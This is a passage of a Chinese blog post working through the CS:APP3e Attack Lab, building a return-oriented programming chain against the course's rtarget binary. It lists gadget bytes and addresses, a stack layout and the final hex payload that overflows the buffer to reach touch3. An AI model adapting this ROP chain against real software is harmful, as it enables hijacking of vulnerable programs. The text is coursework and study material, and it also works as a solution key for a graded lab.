</code></pre></div></div> <p>其他指令都好找，就是<code class="language-plaintext highlighter-rouge">48 89 e7</code>找不到紧跟<code class="language-plaintext highlighter-rouge">c3</code>的。</p> <p>所以只能间接将<code class="language-plaintext highlighter-rouge">%rsp</code>传递给<code class="language-plaintext highlighter-rouge">%rdi</code></p> <p>先按照前缀找:<code class="language-plaintext highlighter-rouge">48 89</code></p> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">0000000000401</span><span class="nf">aab</span> <span class="o">&lt;</span><span class="nv">setval_350</span><span class="o">&gt;</span><span class="p">:</span>
  <span class="err">401</span><span class="nl">aab:</span> <span class="nf">c7</span> <span class="mi">07</span> <span class="mi">48</span> <span class="mi">89</span> <span class="nv">e0</span> <span class="mi">90</span>            	<span class="nv">movl</span>	<span class="kc">$</span><span class="mh">0x90e08948</span><span class="p">,</span> <span class="p">(</span><span class="o">%</span><span class="nb">rdi</span><span class="p">)</span>     <span class="err">#</span> <span class="nv">imm</span> <span class="err">=</span> <span class="mh">0x90E08948</span>
  <span class="err">401</span><span class="nl">ab1:</span> <span class="nf">c3</span>                           	<span class="nv">retq</span>
</code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">48 89 e0</code>正好是<code class="language-plaintext highlighter-rouge">mov %rsp, %rax</code>是可以接受的，并且<code class="language-plaintext highlighter-rouge">90</code>是nop.</p> <p>那么还差一个<code class="language-plaintext highlighter-rouge">mov %rax, %rdi</code>是重复的。</p> <p>所以:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>address + 0x38: [cookie的ASCII]  # &lt;- %rdi + 0x30
address + 0x30: [touch3的地址]
address + 0x28: [gadget 6的地址]
address + 0x20: [add_xy()的地址]
address + 0x18: [第二个参数:0x28]
address + 0x10: [gadget 4的地址]
address + 0x08: [gadget 2的地址]  # mov %rsp, %rax时，%rsp在这
address       : [gadget 0的地址]  # &lt;- %rsp 即将ret跳转到gadget0
--------上面是栈的结构----------

gadget 0: mov %rsp, %rax        # 间接传递，先传给%rax
gadget 1: ret
gadget 2: mov %rax, %rdi        # 获取%rsp的值 初始化add的第一个参数
gadget 3: ret                   # 进入gadget4
gadget 4: popq %rsi             # 初始化%rsi第二个参数为0x30
gadget 5: ret                   # 然后ret进入add_xy:0x4019d6

# 进入add_xy之后ret
# %rax为加法结果: %rdi + 0x30

*gadget 6: mov %rax, %rdi        # 加法结果保存为第一个参数
*gadget 7: ret                   # 这是add_xy内部的ret
</code></pre></div></div> <p>那么<code class="language-plaintext highlighter-rouge">gadgets</code>的字节码及其地址有:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>48 89 e0 # mov %rsp, %rax -&gt; 0x401a06
c3       # ret
48 89 c7 # mov %rax, %rdi -&gt; 0x4019a2
c3       # ret
5e       # popq %rsi      -&gt; 0x401383
c3       # ret
48 89 c7 # mov %rax, %rdi -&gt; 0x4019a2
c3       # ret
</code></pre></div></div> <p>查找字节码在<code class="language-plaintext highlighter-rouge">rtarget.asm</code>的地址，得到缓冲区输入的内容有:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00 # 覆盖ret地址，gadget 0的地址
a2 19 40 00 00 00 00 00 # gadget 2的地址
83 13 40 00 00 00 00 00 # gadget 4的地址
30 00 00 00 00 00 00 00 # 第二个参数 0x30
d6 19 40 00 00 00 00 00 # add_xy的地址
a2 19 40 00 00 00 00 00 # gadget 6的地址
fa 18 40 00 00 00 00 00 # touch3的入口
35 39 62 39 39 37 66 61 # cookie的ASCII
</code></pre></div></div> <p>完结撒花。</p> <h1 id="总结">总结</h1> <p>对栈帧结构了解很多，深入理解了函数栈，以及缓冲区溢出攻击的方式。</p> <p>不得不感慨国内外CS教育的差距。</p> </div> </article> <div id="giscus_thread" style="max-width: 930px; margin: 0 auto;"> <script>let giscusTheme=determineComputedTheme(),giscusAttributes={src:"https://giscus.app/client.js","data-repo":"Iamnotphage/iamnotphage.github.io","data-repo-id":"R_kgDONFoQgA","data-category":"Announcements","data-category-id":"DIC_kwDONFoQgM4CjtJq","data-mapping":"pathname","data-strict":"0","data-reactions-enabled":"1","data-emit-metadata":"0","data-input-position":"bottom","data-theme":giscusTheme,"data-lang":"en",crossorigin:"anonymous",async:""},giscusScript=document.createElement("script");Object.entries(giscusAttributes).forEach(([t,e])=>giscusScript.setAttribute(t,e)),document.getElementById("giscus_thread").appendChild(giscusScript);</script> <noscript>Please enable JavaScript to view the <a href="http://giscus.app/?ref_noscript" rel="external nofollow noopener" target="_blank">comments powered by giscus.</a> </noscript> </div> </div> </div> </div> </div> <footer class="fixed-bottom" role="contentinfo"> <div class="container mt-0"> © Copyright 2025 Chen Yeung. Powered by <a href="https://jekyllrb.com/" target="_blank" rel="external nofollow noopener">Jekyll</a> with <a href="https://github.com/alshedivat/al-folio" rel="external nofollow noopener" target="_blank">al-folio</a> theme. Hosted by <a href="https://pages.github.com/" target="_blank" rel="external nofollow noopener">GitHub Pages</a>. Photos from <a href="https://unsplash.com" target="_blank" rel="external nofollow noopener">Unsplash</a>. </div> </footer> <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script> <script src="/assets/js/bootstrap.bundle.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/js/mdb.min.js" integrity="sha256-NdbiivsvWt7VYCt6hYNT3h/th9vSTL4EDWeGs5SN3DA=" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/npm/masonry-layout@4.2.2/dist/masonry.pkgd.min.js" integrity="sha256-Nn1q/fx0H7SNLZMQ5Hw5JLaTRZp0yILA/FRexe19VdI=" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/npm/imagesloaded@5.0.0/imagesloaded.pkgd.min.js" integrity="sha256-htrLFfZJ6v5udOG+3kNLINIKh2gvoKqwEhHYfTTMICc=" crossorigin="anonymous"></script> <script defer src="/assets/js/masonry.js" type="text/javascript"></script> <script defer src="https://cdn.jsdelivr.net/npm/medium-zoom@1.1.0/dist/medium-zoom.min.js" integrity="sha256-ZgMyDAIYDYGxbcpJcfUnYwNevG/xi9OHKaR/8GK+jWc=" crossorigin="anonymous"></script> <script defer src="/assets/js/zoom.js?85ddb88934d28b74e78031fd54cf8308"></script> <script defer src="/assets/js/bootstrap-toc.min.js?c82ff4de8b0955d6ff14f5b05eed7eb6"></script> <script src="/assets/js/no_defer.js?2781658a0a2b13ed609542042a859126"></script> <script defer src="/assets/js/common.js?e0514a05c5c95ac1a93a8dfd5249b92e"></script> <script defer src="/assets/js/copy_code.js?12775fdf7f95e901d7119054556e495f" type="text/javascript"></script> <script defer src="/assets/js/jupyter_new_tab.js?d9f17b6adc2311cbabd747f4538bb15f"></script> <script async src="https://d1bxh8uas1mnw7.cloudfront.net/assets/embed.js"></script> <script async src="https://badge.dimensions.ai/badge.js"></script> <script type="text/javascript">window.MathJax={tex:{tags:"ams"}};</script> <script defer type="text/javascript" id="MathJax-script" src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-mml-chtml.js" integrity="sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI=" crossorigin="anonymous"></script> <script defer src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6" crossorigin="anonymous"></script> <script type="text/javascript">function progressBarSetup(){"max"in document.createElement("progress")?(initializeProgressElement(),$(document).on("scroll",function(){progressBar.attr({value:getCurrentScrollPosition()})}),$(window).on("resize",initializeProgressElement)):(resizeProgressBar(),$(document).on("scroll",resizeProgressBar),$(window).on("resize",resizeProgressBar))}function getCurrentScrollPosition(){return $(window).scrollTop()}function initializeProgressElement(){let e=$("#navbar").outerHeight(!0);$("body").css({"padding-top":e}),$("progress-container").css({"padding-top":e}),progressBar.css({top:e}),progressBar.attr({max:getDistanceToScroll(),value:getCurrentScrollPosition()})}function getDistanceToScroll(){return $(document).height()-$(window).height()}function resizeProgressBar(){progressBar.css({width:getWidthPercentage()+"%"})}function getWidthPercentage(){return getCurrentScrollPosition()/getDistanceToScroll()*100}const progressBar=$("#progress");window.onload=function(){setTimeout(progressBarSetup,50)};</script> <script src="/assets/js/vanilla-back-to-top.min.js?f40d453793ff4f64e238e420181a1d17"></script> <script>addBackToTop();</script> <script type="module" src="/assets/js/search/ninja-keys.min.js?a3446f084dcaecc5f75aa1757d087dcf"></script> <ninja-keys hidebreadcrumbs noautoloadmdicons placeholder="Type to start searching"></ninja-keys> <script>let searchTheme=determineComputedTheme();const ninjaKeys=document.querySelector("ninja-keys");"dark"===searchTheme?ninjaKeys.classList.add("dark"):ninjaKeys.classList.remove("dark");const openSearchModal=()=>{const e=$("#navbarNav");e.hasClass("show")&&e.collapse("hide"),ninjaKeys.open()};</script> <script>const ninja=document.querySelector("ninja-keys");ninja.data=[{id:"nav-about",title:"about",section:"Navigation",handler:()=>{window.location.href="/"}},{id:"nav-blog",title:"blog",description:"",section:"Navigation",handler:()=>{window.location.href="/blog/"}},{id:"nav-projects",title:"projects",description:"A growing collection of your cool projects.",section:"Navigation",handler:()=>{window.location.href="/projects/"}},{id:"nav-repositories",title:"repositories",description:"Here are some source codes. Enjoy yourself.",section:"Navigation",handler:()=>{window.location.href="/repositories/"}},{id:"nav-cv",title:"cv",description:"This is my Curriculum Vitae.",section:"Navigation",handler:()=>{window.location.href="/cv/"}},{id:"dropdown-publications",title:"publications",description:"",section:"Dropdown",handler:()=>{window.location.href=""}},{id:"dropdown-projects",title:"projects",description:"",section:"Dropdown",handler:()=>{window.location.href=""}},{id:"dropdown-blog",title:"blog",description:"",section:"Dropdown",handler:()=>{window.location.href="/blog/"}},{id:"post-\u5411\u91cf\u548c\u77e9\u9635\u5404\u79cd\u4e58\u79ef\u4ee5\u53ca\u5176\u5bf9\u5e94\u7684numpy\u5e93api\u89e3\u91ca",title:"\u5411\u91cf\u548c\u77e9\u9635\u5404\u79cd\u4e58\u79ef\u4ee5\u53ca\u5176\u5bf9\u5e94\u7684numpy\u5e93API\u89e3\u91ca",description:"\u4e00\u6587\u89e3\u91ca\u6e05\u695a\u70b9\u4e58\u3001\u53c9\u4e58\u3001\u77e9\u9635\u4e58\u6cd5\u3001Hadamard\u4e58\u79ef\u7b49\u4ee5\u53ca\u5bf9\u5e94Numpy\u63a5\u53e3",section:"Posts",handler:()=>{window.location.href="/blog/2025/%E7%9F%A9%E9%98%B5%E4%B9%98%E6%B3%95%E7%AC%A6%E5%8F%B7%E5%92%8CNumpy%E8%A7%A3%E9%87%8A/"}},{id:"post-ssh\u8fde\u63a5\u8fdc\u7a0b\u670d\u52a1\u5668\u7ec8\u6781\u6559\u7a0b",title:"SSH\u8fde\u63a5\u8fdc\u7a0b\u670d\u52a1\u5668\u7ec8\u6781\u6559\u7a0b",description:"\u672c\u6587\u63cf\u8ff0\u4e86ssh\u76f8\u5173\u77e5\u8bc6\uff0cssh\u8fdc\u7a0b\u8fde\u63a5\u670d\u52a1\u5668\u6b65\u9aa4\uff0c\u4ee5\u53ca\u6240\u6709\u5751\u7684\u89e3\u51b3\u65b9\u6848",section:"Posts",handler:()=>{window.location.href="/blog/2024/sshTutorial/"}},{id:"post-my-dbms",title:"my DBMS",description:"\u897f\u7535\u7f16\u8bd1\u539f\u7406\u5927\u4f5c\u4e1a:\u7cbe\u7b80SQL\u7f16\u8bd1\u5668\u5b9e\u73b0",section:"Posts",handler:()=>{window.location.href="/blog/2024/myDBMS/"}},{id:"post-princeton-algorithm-i-amp-ii-labs",title:"Princeton Algorithm I &amp; II Labs",description:"\u666e\u6797\u65af\u987f\u7b97\u6cd5\u7b2c\u56db\u7248\u8bfe\u540eLabs",section:"Posts",handler:()=>{window.location.href="/blog/2023/algs4/"}},{id:"post-\u897f\u7535cs\u6838\u5fc3\u8bfe\u7a0b\u6307\u5357",title:"\u897f\u7535CS\u6838\u5fc3\u8bfe\u7a0b\u6307\u5357",description:"\u897f\u7535CS\u751f\u5b58\u6307\u5357(\u8ba1\u7ec4)",section:"Posts",handler:()=>{window.location.href="/blog/2022/CSSurvivalGuide/"}},{id:"post-cmc-speedrun",title:"CMC-SpeedRun",description:"\u901f\u901a\u5168\u56fd\u5927\u5b66\u751f\u6570\u5b66\u7ade\u8d5b(\u975e\u6570\u5b66\u4e13\u4e1a)\u6559\u7a0b",section:"Posts",handler:()=>{window.location.href="/blog/2022/%E9%80%9F%E9%80%9A%E5%85%A8%E5%9B%BD%E5%A4%A7%E5%AD%A6%E7%94%9F%E6%95%B0%E5%AD%A6%E7%AB%9E%E8%B5%9B/"}},{id:"post-ti-rslk\u81ea\u52a8\u5faa\u8ff9\u5c0f\u8f66",title:"TI-RSLK\u81ea\u52a8\u5faa\u8ff9\u5c0f\u8f66",description:"\u897f\u7535\u53cc\u521b\u5468\u5c0f\u9879\u76ee:\u81ea\u52a8\u5faa\u8ff9\u5c0f\u8f66\u5b9e\u73b0",section:"Posts",handler:()=>{window.location.href="/blog/2022/TI-RSLK%E8%87%AA%E5%8A%A8%E5%BE%AA%E8%BF%B9%E5%B0%8F%E8%BD%A6/"}},{id:"post-cs-app3e-cache-lab",title:"CS:APP3e Cache Lab",description:"Personal Crack on CS:APP3e Cache Lab",section:"Posts",handler:()=>{window.location.href="/blog/2022/CSAPP3eCache/"}},{id:"post-cs-app3e-arch-lab",title:"CS:APP3e Arch Lab",description:"Personal Crack on CS:APP3e Arch Lab",section:"Posts",handler:()=>{window.location.href="/blog/2022/CSAPP3eArch/"}},{id:"post-cs-app3e-attack-lab",title:"CS:APP3e Attack Lab",description:"Personal Crack on CS:APP3e Attack Lab",section:"Posts",handler:()=>{window.location.href="/blog/2022/CSAPP3eAttack/"}},{id:"post-cs-app3e-bomb-lab",title:"CS:APP3e Bomb Lab",description:"Personal Crack on CS:APP3e Bomb Lab",section:"Posts",handler:()=>{window.location.href="/blog/2022/CSAPP3eBomb/"}},{id:"post-cs-app3e-data-lab",title:"CS:APP3e Data Lab",description:"Personal Crack on CS:APP3e Data Lab",section:"Posts",handler:()=>{window.location.href="/blog/2022/CSAPP3eData/"}},{id:"news-eniac-was-born-it-has-nothing-to-do-with-me",title:"ENIAC was born.(It has nothing to do with me.)",description:"",section:"News"},{id:"news-completed-a-internship-at-huawei-tech-co-ltd",title:"Completed a internship at Huawei Tech Co., Ltd.",description:"",section:"News"},{id:"news-received-a-graduate-school-recommendation-for-admission-to-xi-an-jiaotong-university",title:"Received a graduate school recommendation for admission to Xi\u2019an Jiaotong University.",description:"",section:"News"},{id:"projects-project-1",title:"project 1",description:"with background image",section:"Projects",handler:()=>{window.location.href="/projects/1_project/"}},{id:"projects-project-2",title:"project 2",description:"a project with a background image and giscus comments",section:"Projects",handler:()=>{window.location.href="/projects/2_project/"}},{id:"projects-project-3-with-very-long-name",title:"project 3 with very long name",description:"a project that redirects to another website",section:"Projects",handler:()=>{window.location.href="/projects/3_project/"}},{id:"projects-project-4",title:"project 4",description:"another without an image",section:"Projects",handler:()=>{window.location.href="/projects/4_project/"}},{id:"projects-project-5",title:"project 5",description:"a project with a background image",section:"Projects",handler:()=>{window.location.href="/projects/5_project/"}},{id:"projects-project-6",title:"project 6",description:"a project with no image",section:"Projects",handler:()=>{window.location.href="/projects/6_project/"}},{id:"projects-project-7",title:"project 7",description:"with background image",section:"Projects",handler:()=>{window.location.href="/projects/7_project/"}},{id:"projects-project-8",title:"project 8",description:"an other project with a background image and giscus comments",section:"Projects",handler:()=>{window.location.href="/projects/8_project/"}},{id:"projects-project-9",title:"project 9",description:"another project with an image \ud83c\udf89",section:"Projects",handler:()=>{window.location.href="/projects/9_project/"}},{id:"socials-email",title:"Send email",section:"Socials",handler:()=>{window.open("mailto:%69%61%6D%6E%6F%74%70%68%61%67%65@%31%36%33.%63%6F%6D","_blank")}},{id:"socials-google-scholar",title:"Google Scholar",section:"Socials",handler:()=>{window.open("https://scholar.google.com/citations?user=qc6CJjYAAAAJ","_blank")}},{id:"socials-rss",title:"RSS Feed",section:"Socials",handler:()=>{window.open("/feed.xml","_blank")}},{id:"light-theme",title:"Change theme to light",description:"Change the theme of the site to Light",section:"Theme",handler:()=>{setThemeSetting("light")}},{id:"dark-theme",title:"Change theme to dark",description:"Change the theme of the site to Dark",section:"Theme",handler:()=>{setThemeSetting("dark")}},{id:"system-theme",title:"Use system default theme",description:"Change the theme of the site to System Default",section:"Theme",handler:()=>{setThemeSetting("system")}}];</script> <script src="/assets/js/shortcut-key.js?6f508d74becd347268a7f822bca7309d"></script> </body> </html>